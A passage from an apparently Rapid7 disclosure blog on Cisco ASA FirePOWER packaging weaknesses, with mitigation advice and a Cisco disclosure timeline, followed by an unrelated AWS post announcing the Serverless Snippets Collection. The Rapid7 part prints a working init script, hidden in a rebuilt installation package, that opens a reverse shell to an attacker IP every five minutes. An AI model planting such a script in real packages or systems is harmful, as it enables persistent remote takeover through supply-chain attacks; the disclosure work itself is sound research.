      \/_____/\ \ \/
               \ \_\
                \/_/

[+] User provided package: /home/albinolobster/Desktop/asasfr-sys-5.4.1-211.pkg
[+] Copying the provided file to ./tmp
[+] Extracting decryption materials
[+] Attempting to decrypt the package... this might take 10ish minutes (and a lot of memory, sorry!)
[+] Successful decryption! Cleaning up extra files
[+] Unpacking...
... snip lots of annoying output ...
[+] Generating the data archive
[+] Creating new.pkg...
[+] Writing file and section headers
[+] Appending the compressed archive
[+] Appending the checksum section
[+] Completed new.pkg

The newly generated FirePOWER installation package can then be installed on the ASA as it normally would. And because it contains all the official installation package content, it will appear to be a normal installation to the user. However, this installation will include the following obviously malicious init script, which will try to connect back to an attacker IP every five minutes.

#!/bin/sh

source /etc/rc.d/init.d/functions
PATH="/usr/local/bin:/usr/bin:/bin:/usr/local/sf/bin:/sbin:/usr/sbin"

xploit_start() {
  (while true; do sleep 300; /bin/bash -i >& /dev/tcp/10.0.0.28/1270 0>&1; done)&
}

case "\$1" in
'start')
  xploit_start
  ;;
*)
  echo "usage $0 start|stop|restart"
esac

This malicious FirePOWER installation package is distributable via social engineering, and it can be used in supply chain attacks. The contents of the installation package survive reboots and upgrades. An attacker need only pre-install the FirePOWER module with a malicious version before providing it to the victim.

Mitigation and detection

Organizations that use Cisco ASA are urged to isolate administrative access as much as possible. That is not limited to simply, “Remove ASDM from the internet.” We’ve demonstrated a few ways malicious packages could reasonably end up on an ASA and none of those mechanisms have been patched. Isolating administrative access from potentially untrustworthy users is important.

Rapid7 has written some YARA rules to help detect exploitation or malicious packages:

Timeline

February 24, 2022 – Initial disclosure of ASDM packaging issues.
February 24, 2022 – Cisco opens a case (PSIRT-0917052332) and assigns CSCwb05264 and CSCwb05291 for ASDM issues.
February 29, 2022 – Cisco informs Rapid7 they have reached out to engineering. Raises concerns regarding 60-day timeline.
March 15, 2022 – Cisco reports they are actively working on the issue.
March 22, 2022 – Initial disclosure of ASA-X with FirePOWER Services issues and ASDM logging issue.
March 23, 2022 – Cisco acknowledges ASA-X issues and assigns PSIRT-0926201709.
March 25, 2022 – Cisco discusses their views on severity scoring and proposes disclosure dates for ASDM issues.
March 29, 2022 – Rapid7 offers extension on disclosure for both PSIRT issues.
April 7, 2022 – Rapid7 asks for an update.
April 7, 20222 – ASA-X issues moved to Cisco PSIRT member handling ASDM issues.
April 8, 2022 – Cisco indicates Spring4Shell is causing delays.
April 13, 2022 – Rapid7 asks for an update.
April 14, 2022 – Cisco indicates ASA-X issues are as designed. ASDM logging issue is a duplicate. Cisco agrees to new disclosure dates, clarification on six-month timelines, Vegas talks work to push things along!
April 14, 2022 – Rapid7 inquires if Cisco is talking about the same ASA-X model.
April 20, 2022 – Rapid7 proposes a June 20, 2022 disclosure. Again asks for clarification on the ASA-X model.
April 22, 2022 – Cisco reiterates ASA-X issues are not vulnerabilities.
April 22, 2022 – Rapid7 attempts to clarify that the ASA-X issues are vulnerabilities.
April 26, 2022 – Cisco plans partial disclosure of ASDM issues around June 20.
May 06, 2022 – Cisco reiterates no timeline for ASA checking ASDM signature. Cisco again reiterates ASA-X issues are not vulnerabilities.
May 06, 2022 – Rapid7 pushes back again on the ASA-X issues.
May 10, 2022 – Rapid7 asks for clarification on what is being fixed/disclosed on June 20.
May 11, 2022 – Rapid7 asks for clarity on ASA-X timeline and what is currently being considered a vulnerability.
May 18, 2022 – Cisco clarifies what is getting fixed for issues, what will receive CVEs, what is a "hardening effort."
May 18, 2022 – Rapid7 requests CVEs, asks about patch vs disclosure release date discrepancy. Rapid7 again reiterates ASA-X findings are vulnerabilities.
May 20, 2022 – Cisco indicates CVEs will be provided soon, indicates Cisco will now publish fixes and advisories on June 21. Cisco reiterates they do not consider boot image issues vulnerabilities. Cisco asks who to credit.
May 25, 2022 – Rapid7 indicates credit to Jake Baines.
May 25, 2022 – CVE-2022-20828 and CVE-2022-20829 assigned, Cisco says their disclosure date is now June 22.
May 26, 2022 – Rapid7 agrees to June 22 Cisco disclosure, requests if there is a disclosure date for ASA side of ASDM signature fixes.
May 31, 2022 – Cisco indicates ASA side of fixes likely coming August 11.
June 09, 2022 – Rapid7 questions the usefulness of boot image hardening. Observes the ASA has no mechanism to prevent literally any bootable ISO from booting (let alone old Cisco-provided ones).
June 09, 2022 – Cisco confirms boot images are not phased out and does not consider that to be a security issue.
June 09, 2022 – Rapid7 reiterates that the ASA will boot any bootable image and that attackers could distribute malicious boot images / packages and the ASA has no mechanism to prevent that.
June 13, 2022 – Rapid7 finally examines Cisco’s assertions regarding the ASDM log password leak being a duplicate and finds it to be incorrect.
June 15, 2022 – Cisco confirms the password leak in 7.17(1) as originally reported.
June 22, 2022 – Cisco confirms password leak fix will be published in upcoming release.
June 23, 2022 – Cisco publishes advisories and bugs.
June 23, 2022 – Rapid7 asks if CVE-2021-1585 was fixed.
June 23, 2022 – Cisco says it was.
June 23, 2022 – Rapid7 says it wasn’t. Asks Cisco if we should open a new PSIRT ticket.
June 23, 2022 – Cisco indicates current PSIRT thread is fine.
June 23, 2022 – Rapid7 provides details and video.
June 23, 2022 – Cisco acknowledges.
July 05, 2022 – Rapid7 asks for an update on CVE-2021-1585 patch bypass.
July 25, 2022 – Cisco provides Rapid7 with test versions of ASDM.
July 26, 2022 – Rapid7 downloads the test version of ASDM.
August 1, 2022 – Rapid7 lets Cisco know that team time constraints may prevent us from completing testing.
August 1, 2022 – Cisco acknowledges.
August 10, 2022 – Rapid7 updates Cisco on publication timing and reconfirms inability to complete testing of new build.
August 11, 2022 – Cisco communicates to Rapid7 that they have released new Software images for ASA (9.18.2, 9.17.1.13, 9.16.3.19) and ASDM (7.18.1.152) and updated the advisories for CVE-2022-20829 and CVE-2021-1585 to note that the vulnerabilities have been resolved.
August 11, 2022 – Rapid7 acknowledges, notifies Cisco that we are unable to verify the latest round of fixes before materials go to press.
August 11, 2022 – This document is published.
August 11, 2022 – Rapid7 presents materials at Black Hat USA.
August 13, 2022 – Rapid7 presents materials at DEF CON.

Rapid7 customers

Authenticated checks were made available to InsightVM and Nexpose customers for the following CVEs in July 2022 based on Cisco’s security advisories:

Please note: Shortly before this blog’s publication, Cisco released new ASA and ASDM builds and updated their advisories to indicate that remediating CVE-2021-1585 and CVE-2022-20829 requires these newer versions. We are updating our vulnerability checks to reflect that these newer versions contain what Cisco has communicated to be the proper fixes.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Introducing the new AWS Serverless Snippets Collection

2022-08-11 dboyne

Post Syndicated from dboyne original https://aws.amazon.com/blogs/compute/introducing-the-new-aws-serverless-snippets-collection/

Today, the AWS Serverless Developer Advocate team introduces the Serverless Snippets Collection. This is a new page hosted on Serverless Land that makes it easier to discover, copy, and share common code that can help with serverless application development.

Builders are writing serverless applications in many programming languages and spend a growing amount of time finding and reusing code that is trusted and tested.

With many online resources and code located within private repositories, it can be hard to find reusable or up-to-date code snippets that you can copy and paste into your applications or use with your AWS accounts. Code examples can soon become out of date or replaced by new best practices.

The Serverless Snippets Collection is designed to enable reusable, tested, and recommended snippets driven and maintained by the community. Builders can use serverless snippets to find and integrate tools, code examples, and Amazon CloudWatch Logs Insights queries to help with their development workflow.

This blog post explains what serverless snippets are and what challenges they help to solve. It shows how to use the snippets and how builders can contribute to the new collection.

Overview

The new Serverless Snippets Collection helps builders explore and reuse common code snippets to help accelerate application development workflows. Builders can also write their own snippets and contribute them to the site using standard GitHub pull requests.

Serverless snippets are organized into a number of categories, initially supporting Amazon CloudWatch Logs Insights queries, tools, and service integrations.

Code snippets can easily become outdated as new functionality emerges and best practices are discovered. Serverless snippets offer a platform where application developers can collaborate together to keep code examples up to date and relevant, while supporting many programming languages.

Snippets can contain code from any programming language. You can include multiple languages within a single snippet giving you the option to be creative and flexible.

Serverless snippets use tags to simplify discovery. You can use tags to filter by snippet type, programming language, AWS service, or custom tags to find relevant code snippets for your own use cases.

Each snippet type has a custom interface, giving builders a simplified experience and quick deployment methods.

CloudWatch Logs Insights snippets

CloudWatch Logs Insights enables you to search interactively and analyze your log data in CloudWatch Logs. You can use CloudWatch Logs Insights to help you efficiently and effectively search for operational issues, and debug your applications.

Serverless snippets contain a number of CloudWatch Logs Insights queries. These help you analyze your applications faster and include tags such as memory, latency, duration, or errors. You can launch queries directly into your AWS Management Console with one click.

Using CloudWatch Insights snippets

Select the CloudWatch Logs Insights as the snippet type and choose View on a snippet.
Select Open in CloudWatch Insights to launch the snippet directly into your AWS account or copy the code and follow the manual instructions on the page to run the query.

Tool snippets

Another snippet type supported are tools. Builders can search for tools by programming language or AWS service. Tool snippets include detailed instructions on how to install the tool and example usage with additional resource links. Tools can also be tagged by programming language allowing you to select the tools for your particular language using the snippet tabs functionality.

To use tools snippets:

Select Tools as the selected snippet type and View any tool snippet.
Each snippet may have many steps. Follow the instructions documented in the tool snippet to install and use within your own application.

Integration snippets

Service integrations are part of many applications built on AWS. Serverless snippets include integration type snippets to share integration code between AWS services.

For example, you can add a snippet for Amazon S3 integration with AWS Lambda and also split your snippet into programming languages.

To use integration snippets:

Select Integration as the selected snippet type and View any tool snippet.
The integrations snippets give you examples of how you can integrate between AWS services. You can select your desired programming language by selecting the language buttons.

Contributing to the Serverless Snippets Collection

You can write your own snippets and contribute them to the serverless snippets collection, which is stored in the AWS snippets-collection repository. Requests are reviewed for quality and relevancy before publishing.

To submit a snippet:

Choose Submit a Serverless Snippet.
Read the Adding new snippet guide and fill out the GitHub issue template.
Clone the repository. Duplicate and rename the example snippet_model directory (or _snippet-model-multi-files if you want to support multiple files in your snippet)
Add required information in the README.md file.
Add the required meta information to `snippet-data.json`
Add the snippet code to the snippet.txt file.
Submit a pull request to the repository with the new snippet files.

To write snippets with multiple code blocks or to support different runtimes, read the guide.

Conclusion

When building serverless applications, builders reuse and share code across many applications and organizations. These code snippets can be difficult to find across your own applications and local development environments.

Today, the AWS Serverless Developer Advocate team is adding the Serverless Snippets Collection on Serverless Land to help builders search, discover, and contribute reusable code snippets across the world.

The Serverless Snippet Collection includes tools, integration code examples and CloudWatch Logs Insights queries. The collection supports many types of snippets, examples, and code that can be shared across the community.

Builders can use the custom filter functionality to search for snippets by programming language, AWS service, or custom snippet tags.

All serverless developers are invited to contribute to the collection. You can submit a pull request to the Serverless Snippets Collection GitHub repository, which is reviewed for quality before publishing.

For more information on building serverless applications visit Serverless Land.